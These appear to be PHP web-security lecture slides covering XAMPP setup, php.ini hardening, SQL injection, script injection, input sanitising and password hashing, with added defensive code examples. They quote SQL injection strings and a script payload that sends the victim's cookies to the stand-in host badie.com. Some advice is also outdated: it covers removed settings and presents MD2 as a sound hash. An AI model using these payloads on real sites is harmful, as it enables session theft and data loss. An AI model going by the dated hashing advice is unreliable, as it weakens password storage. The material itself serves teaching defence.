PHP 17
Security

PHP-17
XAMPP Security

• XAMPP isn't designed to be a production server, at least not out of the box

• To deploy a real application it may be necessary to use different server software and/or beef up the security
Connection Password

• By default XAMPP uses the empty password "" for the root user

• This should be set to a real password.

• Other users can be given restricted privileges

Connection Password

• The code that connects to the database contains sensitive information (host, user, password)

• So this should not be included in the regular application code

• Placing the connection code in a separate file in the directory above the web root
makes it available to the code running on the server, but not available to be read by
outsiders through the web server

• [Book p 12-121]
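One way to lay this out, as an added example that is not part of the original slides: the credentials live in a file one level above the web root and are pulled in with require. The paths (/opt/lampp/...), the DSN, the user name and PHP 8 (for str_starts_with) are assumptions for a local XAMPP install.

```php
<?php
// Added example (not from the original slides). Layout assumed:
//   /opt/lampp/db_config.php          (outside htdocs, never served by Apache)
//     <?php
//     return ['dsn'  => 'mysql:host=127.0.0.1;dbname=shop;charset=utf8mb4',
//             'user' => 'shop_app', 'pass' => 'CHANGE-ME'];
//   /opt/lampp/htdocs/connect.php     (this file, inside the web root)
declare(strict_types=1);

function loadDbConfig(string $path): array
{
    $real = realpath($path);
    if ($real === false) {
        throw new RuntimeException('database config not found');
    }
    // Refuse a config file that would be reachable through the web server.
    if (!empty($_SERVER['DOCUMENT_ROOT'])) {
        $docRoot = realpath($_SERVER['DOCUMENT_ROOT']);
        if ($docRoot !== false && str_starts_with($real, $docRoot . DIRECTORY_SEPARATOR)) {
            throw new RuntimeException('database config must live outside the web root');
        }
    }
    $cfg = require $real;   // the file returns the array above
    if (!isset($cfg['dsn'], $cfg['user'], $cfg['pass']) || $cfg['pass'] === '') {
        // The empty password is the XAMPP default for root: do not accept it.
        throw new RuntimeException('incomplete database config or empty password');
    }
    return $cfg;
}

function connect(): PDO
{
    $cfg = loadDbConfig(__DIR__ . '/../db_config.php');
    return new PDO($cfg['dsn'], $cfg['user'], $cfg['pass'], [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // fail loudly, log elsewhere
        PDO::ATTR_EMULATE_PREPARES => false,                  // real server-side prepares
    ]);
}
```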
php.ini

• php.ini is a configuration file for the PHP server

• Many of the settings can be changed by editing this text file


php.ini configuration options

Option                     Description

safe_mode = on             Allows PHP scripts to access only files owned by the same user,
                           so it prevents directory traversal attacks

safe_mode_gid = off        Works in combination with safe_mode and does much the same thing

open_basedir = directory   PHP scripts can access only files in the specified directory

expose_php = off           Prevents PHP from disclosing information about itself in the
                           headers it sends to users

register_globals = off     If set to on, GET, POST, cookie and server variables are globals
                           by default, which makes them accessible to hackers; set to off
                           they are more secure

display_errors = off       Prevents PHP from displaying errors and warnings to the user,
                           which could give away information useful to hackers

log_errors = on            Errors and warnings are written to a log file, which can be
                           viewed later

error_log = filename       Specifies where the errors and warnings are to go

file_uploads = off         Most applications don't need to allow file uploads; turn it off
                           if it is not required
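A small audit script, added here and not part of the original slides, that reads the running configuration with ini_get() and reports which of the settings in the table are still in their weaker state. It assumes it is run from the command line against the same php.ini the web server uses; safe_mode and register_globals were removed in PHP 5.4, so on a current PHP they simply do not exist.

```php
<?php
// Added example (not from the original slides): audit the running PHP
// configuration against the php.ini table above.  Run as: php audit_ini.php
declare(strict_types=1);

function iniIsOff(string $name): bool
{
    $v = strtolower((string) ini_get($name));   // ini_get() gives false if unknown
    return in_array($v, ['', '0', 'off', 'false', 'no'], true);
}

function auditIni(): array
{
    $findings = [];
    // Directives that should be Off: version disclosure, error display, uploads.
    foreach (['expose_php', 'display_errors', 'file_uploads'] as $name) {
        if (!iniIsOff($name)) {
            $findings[] = "$name is On; set \"$name = Off\" unless it is required";
        }
    }
    // Errors should go to a log file, not to the user.
    if (iniIsOff('log_errors')) {
        $findings[] = 'log_errors is Off; set "log_errors = On"';
    }
    if ((string) ini_get('error_log') === '') {
        $findings[] = 'error_log is unset; errors fall back to the SAPI default';
    }
    // Restrict file access to the application directory.
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset; scripts may read any file the server user can';
    }
    // Removed in PHP 5.4: ini_get() returns false, so nothing to report on a
    // current PHP.  On an old PHP they must be Off / On respectively.
    if (ini_get('register_globals') !== false && !iniIsOff('register_globals')) {
        $findings[] = 'register_globals is On; set "register_globals = Off"';
    }
    if (ini_get('safe_mode') !== false && iniIsOff('safe_mode')) {
        $findings[] = 'safe_mode is Off; the table above recommends "safe_mode = On"';
    }
    return $findings;
}

foreach (auditIni() ?: ['no findings'] as $line) {
    echo $line, PHP_EOL;
}
```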
SQL Injection Attack

• Hacker includes SQL commands in the input

• This is read as SQL and executed

(cartoon by Randall Munroe)

Name: John'); DROP TABLE users

The input is pasted into the INSERT statement, giving

INSERT INTO users VALUES ('JOHN'); DROP TABLE users);

which the database reads as two statements:

INSERT INTO users VALUES ('JOHN');

DROP TABLE users);

SQL Injection Attack

The login query, with the form fields pasted straight into the SQL:

SELECT * FROM user WHERE userID = '$_POST[usr]' AND password = '$_POST[password]';

Name: John' OR 'woo' = 'woo'; --

The query that is actually executed:

SELECT * FROM user WHERE userID = 'John' OR 'woo' = 'woo' ; -- ' AND password = '$_POST[password]';

Everything after -- is a comment, so the password check is never applied and the OR clause is always true.
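The login query above built by string concatenation, beside the same query as a prepared statement, as an added example that is not part of the original slides. An in-memory SQLite table with constructed rows stands in for the MySQL database so it runs offline; the table and column names follow the slide.

```php
<?php
// Added example (not from the original slides): vulnerable login query beside
// the prepared-statement version.  The rows are constructed test data.
declare(strict_types=1);

function demoDb(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE user (userID TEXT, password TEXT)');
    $db->exec("INSERT INTO user VALUES ('John', 'secret1'), ('Mary', 'secret2')");
    return $db;
}

// Vulnerable: user input becomes part of the SQL text, exactly as on the slide.
function loginVulnerable(PDO $db, string $usr, string $password): int
{
    $sql = "SELECT * FROM user WHERE userID = '$usr' AND password = '$password'";
    return count($db->query($sql)->fetchAll());
}

// Hardened: the input travels as a bound parameter and can never be read as
// SQL syntax, whatever quotes, comments or semicolons it contains.
function loginPrepared(PDO $db, string $usr, string $password): int
{
    $stmt = $db->prepare('SELECT * FROM user WHERE userID = :usr AND password = :pw');
    $stmt->execute([':usr' => $usr, ':pw' => $password]);
    return count($stmt->fetchAll());
}

$db = demoDb();
$injected = "John' OR 'woo' = 'woo'; --";   // the input from the slide above

// Concatenated: the OR clause is always true and "--" removes the password check,
// so rows come back although the password is wrong.
echo 'vulnerable, injected input: ', loginVulnerable($db, $injected, 'wrong'), " row(s)\n";
// Prepared: the whole string is compared against userID as data; nothing matches.
echo 'prepared,   injected input: ', loginPrepared($db, $injected, 'wrong'), " row(s)\n";
// A genuine login still works with the prepared statement.
echo 'prepared,   genuine login:  ', loginPrepared($db, 'John', 'secret1'), " row(s)\n";
```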
Script as Data

Name: <script>document.location='http://badie.com/bad.php?cookies='+document.cookie</script>

The page that is sent back to the browser:

<html>
<body>
Welcome Mr.<script>document.location='http://badie.com/bad.php?cookies='+document.cookie</script>
</body>
Sanitising Inputs

Much as we might check an input to see if it conforms to the expected
format (phone number), we can check inputs to ensure there is nothing
malicious.

If a name is being entered, for example, it should comprise only

• letters

• ' (O'Conor)

• - (Jean-Luc)

It should be rejected if it contains

• numbers

• tags

• brackets
Sanitising Inputs

• Where HTML is to be allowed in data, all special characters should be
converted to their HTML entities

• & becomes &amp;

• < becomes &lt;

• " becomes &quot;

• The htmlentities() function can be used for this

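The two checks from the last two slides on one name field, as an added example that is not part of the original slides: validName() applies the slide's rule (letters, apostrophes and hyphens only; Unicode letters are assumed to be wanted), and escapeForHtml() wraps htmlentities() so the "Welcome Mr." page from the Script as Data slide shows the script as text instead of running it.

```php
<?php
// Added example (not from the original slides): validate a name on input and
// encode it on output.  Test strings are constructed for the demonstration.
declare(strict_types=1);

function validName(string $name): bool
{
    // Letters, ' and - only; must start with a letter; 1..100 characters.
    // Digits, tags (<...>) and brackets all fail this pattern.
    return preg_match('/^\p{L}[\p{L}\'\-]{0,99}$/uD', $name) === 1;
}

function escapeForHtml(string $data): string
{
    // ENT_QUOTES also converts ' so the value is safe inside attributes too.
    return htmlentities($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function welcomePage(string $name): string
{
    // Encoding happens at the point where the data meets the HTML.
    return "<html><body>Welcome Mr. " . escapeForHtml($name) . "</body></html>";
}

$inputs = [
    "O'Conor",
    "Jean-Luc",
    "Bobby1",                                   // contains a digit
    "<script>document.location='http://badie.com/bad.php?cookies='+document.cookie</script>",
];
foreach ($inputs as $in) {
    echo validName($in) ? 'accepted' : 'rejected', ': ', $in, PHP_EOL;
}
// Even data that slipped past validation (or was stored before it existed) is
// harmless once encoded: < becomes &lt; and the browser displays it as text.
echo welcomePage($inputs[3]), PHP_EOL;
```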

Securing Passwords
• In an ideal world everybody would use a different password for every
system they use

• If a single system is compromised then only that system is affected

• Often people use the same password on different systems

• If one is compromised then all the systems using the same password are
insecure

• There have been several high-profile cases of this

Securing Passwords

YAHOO.COM (example user table, passwords stored in clear)

e-mail                  password
colin.manning@cit.ie    bananaskins
dan.murphy@gmail.com    dantheman
peter@ge.com            pengineer
joe.smith@gmail.com     password
Hash Function
• A hash function maps data of an arbitrary size to data of a fixed size

• The data from the arbitrarily large set is known as the key

• The result of the hash function is known as the hash

• A good hash function

• is one way

• provides no insight into the value of the key

DA1 Hash Function

bananaskins → sniksananab

function da1_hash($key)
{
    // Reverse the key and keep at most its first 30 characters.
    // (Called da1_hash because hash() is already a built-in PHP function.)
    return substr(strrev($key), 0, 30);
}

• This hash function reveals too much about the key
DA2 Hash Function

bananaskins → 147

function da2_hash($key)
{
    $digit_1 = strlen($key) % 10;                                  // length of key
    $digit_2 = preg_match_all('/[aeiou]/i', $key) % 10;            // number of vowels
    $digit_3 = preg_match_all('/[b-df-hj-np-tv-z]/i', $key) % 10;  // number of consonants
    return $digit_1 . $digit_2 . $digit_3;   // "bananaskins": 11 letters, 4 vowels, 7 consonants gives "147"
}

Securing Passwords

YAHOO.COM (the same table, now storing hashes instead of passwords)

e-mail                  password_hash
colin.manning@cit.ie    147
dan.murphy@gmail.com    936
peter@ge.com            954
joe.smith@gmail.com     862

Login check:

if hash(pword_entered) == password_hash
{
    // login is good
}
Securing Passwords

YAHOO.COM

e-mail                  password_hash
colin.manning@cit.ie    147   ?
dan.murphy@gmail.com    936   ?
peter@ge.com            954
joe.smith@gmail.com     862
DA2 Hash Function

bananaskins → 147

• The number of possible hashes for this function is too small: three decimal digits give at most 1000 distinct values

MD2 Hash Function

bananaskins → 1f73cc189528669e51aa4b851764c6c2

• provides no insight into the value of the key

• has a large number of possible values

Whirlpool Hash Function

bananaskins → 0557ab10f7fb8ce53af2af7238ae245bbc62d3629d83263879839ea87faa8f456d1c9586b87374a5ccc54d752fc65a49fa228e76eed782b896e4629ee8dba4c0

• provides no insight into the value of the key

• has a large number of possible values
Hash Function Vulnerabilities

• There is a small number of commonly used hash functions

• Many people use real words as passwords

• A dictionary attack can run through a list of words, hash each one, and
compare the results with the stored hashed values
Salting the Hash Function

• Adding salt to the key before it is sent to the hash function can make the
system more secure

• The salt is a randomly chosen sequence added to the key (in the example that
follows it is placed in front of the key)

MD2 Hash Function

• Salt is added to the key before sending it to the hash function

• Salt: Q6d&7Xp1

Without salt:

bananaskins → 1f73cc189528669e51aa4b851764c6c2

With salt:

Q6d&7Xp1bananaskins → b2e9ae6ca1f9d07f438918da82af8615
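Why the salt helps, as an added example that is not part of the original slides: a precomputed word-to-hash table built with PHP's hash() finds an unsalted MD2 hash immediately, but not the salted one with the slide's salt. The closing lines use password_hash() and password_verify(), PHP's built-in functions (bcrypt with a fresh random salt per call); they are not on the slides but are the recommended replacement for the hash(pword_entered) == password_hash check. The word list is constructed.

```php
<?php
// Added example (not from the original slides): salted versus unsalted hashing
// against a precomputed word list, then password_hash()/password_verify().
declare(strict_types=1);

function saltedHash(string $algo, string $salt, string $key): string
{
    // Salt placed in front of the key, as in the MD2 slides above.
    return hash($algo, $salt . $key);
}

// Precomputed table of unsalted hashes: hash => word (constructed word list).
function hashTable(string $algo, array $words): array
{
    $table = [];
    foreach ($words as $w) {
        $table[hash($algo, $w)] = $w;
    }
    return $table;
}

function lookup(array $table, string $storedHash): ?string
{
    return $table[$storedHash] ?? null;
}

$table = hashTable('md2', ['password', 'bananaskins', 'dantheman', 'letmein']);

// Unsalted storage: the stored hash is a plain hash of a dictionary word.
var_dump(lookup($table, hash('md2', 'bananaskins')));
// Salted storage: the same password now hashes to a value the table cannot hold,
// and each user's salt would need its own table.
var_dump(lookup($table, saltedHash('md2', 'Q6d&7Xp1', 'bananaskins')));

// Recommended in practice: password_hash() picks a random salt per call and
// stores it inside the result, so two users with the same password get
// different hashes; password_verify() does the comparison, not ==.
$stored1 = password_hash('bananaskins', PASSWORD_BCRYPT);
$stored2 = password_hash('bananaskins', PASSWORD_BCRYPT);
var_dump($stored1 !== $stored2);                     // different salts
var_dump(password_verify('bananaskins', $stored1));   // correct password
var_dump(password_verify('bananaskin', $stored1));    // wrong password
```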
Other Uses of Hash Functions

• Data Storage

• Cryptography

• Block-chain

Further Reading

• https://www.wired.com/2016/05/hacker-lexicon-sql-injections-everyday-hackers-favorite-attack/

• https://arstechnica.com/information-technology/2012/08/passwords-under-assault/

• https://arstechnica.com/information-technology/2013/03/how-i-became-a-password-cracker/
